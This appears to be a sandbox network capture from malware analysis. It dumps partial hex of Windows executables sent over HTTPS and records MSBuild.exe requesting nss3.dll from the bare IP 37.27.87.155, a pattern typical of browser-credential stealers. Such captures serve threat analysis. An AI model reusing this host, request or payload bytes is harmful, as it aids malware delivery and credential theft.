                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                                                          Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                                                          Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                                                          Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                                                          Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                                                          Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                                                          Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                                                          Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                                                          Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                                                          Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          14192.168.2.44975137.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:28 UTC153OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                                                          Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                                                          Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                                                          Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                                                          Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                                                          Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                                                          2024-04-20 12:28:29 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
